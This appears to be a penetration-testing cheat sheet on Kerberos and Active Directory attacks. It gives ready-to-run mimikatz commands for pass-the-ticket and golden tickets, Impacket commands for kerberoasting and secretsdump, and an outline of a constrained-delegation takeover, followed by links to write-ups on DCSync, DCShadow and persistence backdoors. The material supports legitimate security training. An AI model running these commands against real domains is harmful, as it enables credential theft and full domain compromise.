x

AD Kerberos (88)

The Kerberos Protocol is a network authentication protocol designed to provide secure authentication between users and services on a network. Clients and services communicate with a Key Distribution Center (KDC) on port 88. This consists of 2 components:

  • The Authentication Service (AS)
  • The Ticket Granting Service (TGS)

The KDC issues "tickets" that allow clients to authenticate to services without repeatedly sending passwords, enhancing security. This port is crucial for handline the authentication process for users, machines and services in the network.

To authenticate with Kerberos, you can use any kerberos client.

There are a ton of different attacks on Kerberos.

Pass the Ticket

Once a valid Kerberos ticket is obtained, PtT (Pass the Ticket) attacks can be performed using mimikatz. 

mimikatz "kerberos::ptt ticket.kirbi"

Replace "ticket.kirbi" with your Kerberos ticket file.
mimikatz injects this ticket into memory, so any following command is authenticated against the Kerberos server using this ticket.

GetUserSPNs

We can use GetUserSPNs.py from Impacket to request Service Principal Names (SPNs) which might reveal valuable information and valid usernames. 

python GetUserSPNs.py -request -dc-ip 10.0.0.1 DOMAIN/user

Secrets Dumping

Once the system is compromised, a dump of all critical data including tickets, hashes, etc. can be performed to extend the attack.
Using secretsdump.py from Impacket: 

python secretsdump.py -just-dc domain/Administrator:Password@10.0.0.1

Replace "domain/Administrator:Password" with the valid user and password.

Golden Ticket Attack

Creating a golden ticket allows virtually unrestricted access to the whole domain. For this, using mimikatz commands: 

mimikatz "kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXX /krbtgt:eeb9046b77d48962314e376f1925065a /id:500"

https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets.md

Abusing Kerberos constrained delagation

This targets a domain computer, specifically service principals related to the target domain computer. Impersonated Service Tickets may allow high-level access to services on the target like CIFS, HTTP, etc, if the impersonated account has privileges. Sometimes takeover of the computer.

Prerequisites:

  • a domain account with write access to the target computer (exactly write access to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer domain object)
  • permission to create new computer accounts (this is usually default, see MachineAccountQuota)
  • LDAP (389/tcp) and SAMR (445/tcp) (or LDAPS (636/tcp)) access to the DC.
  • Kerberos (88/tcp) access to the DC

Very basic overview of the attack path:
1. Create a fake computer
2. Abuse msDS-AllowedToActOnBehalfOfOtherIdentity property of the target
3. Request impersonated Service Tickets (S4U) for the target computer

https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation.md

https://github.com/tothi/rbcd-attack/tree/master

A collection of techniques that exploit and abuse Active Directory, Kerberos authentication, Domain Controllers and similar matters.

Abusing AD Discretionary Access Control Lists (DACLs) and Access Control Entries (ACEs)
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces.md

Abusing AD with BloodHound
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux.md

AD enumeration with an AD module without RSAT or administrator privileges
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges.md

AD Enumeration with PowerView
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview.md

AD account password spraying
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying.md

AS-REP Roasting
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat.md

Child Domain Admin to Enterprise Admin
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain.md

Domain compromise via DC print server and kerberos delegation
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation.md

Kerberos unrestricted delegation
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation.md

DCSync - Dump password hashes from a Domain Controller
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync.md

From DNS Admins to SYSTEM to compromise
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise.md

Backdooring AdminSDHolder for persistence
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence.md

Kerberoasting - Requesting RC4 encrypted TGS when AES is enabled
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled.md

Kerberos Silver Tickets
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets.md

Pass-the-Hash with Machine$ accounts
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts.md

Privileged accounts and token privileges
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges.md

Kerberos resource based constrained delegation - Computer object take-over
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution.md

DCShadow - Becoming a rogue domain controller
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow.md

Kerberoasting
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md

Using DACLs to check AD object permissions
https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions.md

Left-click: follow link, Right-click: select node, Scroll: zoom
x